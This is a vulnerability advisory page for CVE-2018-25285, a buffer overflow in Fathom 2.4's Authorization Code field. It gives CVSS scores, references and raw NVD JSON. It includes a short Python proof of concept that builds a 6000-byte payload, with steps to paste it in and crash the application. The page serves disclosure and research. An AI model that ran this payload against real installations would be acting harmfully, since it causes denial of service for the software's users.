CVE-2018-25285

Description

Fathom 2.4 contains a buffer overflow vulnerability in the Authorization Code field that allows local attackers to crash the application by submitting an oversized input string. Attackers can paste a 6000-byte payload into the Authorization Code field and click Activate to trigger a denial of service condition.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Fathom 2.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# Proof of Concept (PoC) for CVE-2018-25285
# This script generates a payload to trigger the buffer overflow in Fathom 2.4

def generate_overflow_payload():
    """
    Generates a payload of 6000 bytes to overflow the Authorization Code field.
    """
    # Create a string of 'A' characters (0x41) with a length of 6000 bytes
    payload = "A" * 6000
    return payload

if __name__ == "__main__":
    payload = generate_overflow_payload()
    print("[+] Payload generated successfully.")
    print(f"[+] Payload length: {len(payload)} bytes")
    print("[+] Instructions:")
    print("1. Copy the generated payload.")
    print("2. Open Fathom 2.4 application.")
    print("3. Paste the payload into the 'Authorization Code' field.")
    print("4. Click the 'Activate' button.")
    print("5. The application should crash, triggering the DoS.")
    print("--- Payload Start ---")
    print(payload)
    print("--- Payload End ---")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2018-25285
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2018-25285
[3] CVE Details https://www.cvedetails.com/cve/CVE-2018-25285/
[4] VulDB https://vuldb.com/cve/CVE-2018-25285
[5] https://fathom.concord.org/
[6] https://fathom.concord.org/download/
[7] https://www.exploit-db.com/exploits/45294
[8] https://www.vulncheck.com/advisories/fathom-denial-of-service-via-authorization-code-buffer-overflow

Raw JSON Data

JSON

{"cve": {"id": "CVE-2018-25285", "sourceIdentifier": "[email protected]", "published": "2026-04-26T22:17:29.457", "lastModified": "2026-04-27T18:55:32.883", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fathom 2.4 contains a buffer overflow vulnerability in the Authorization Code field that allows local attackers to crash the application by submitting an oversized input string. Attackers can paste a 6000-byte payload into the Authorization Code field and click Activate to trigger a denial of service condition."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-120"}]}], "references": [{"url": "https://fathom.concord.org/", "source": "[email protected]"}, {"url": "https://fathom.concord.org/download/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/45294", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/fathom-denial-of-service-via-authorization-code-buffer-overflow", "source": "[email protected]"}]}}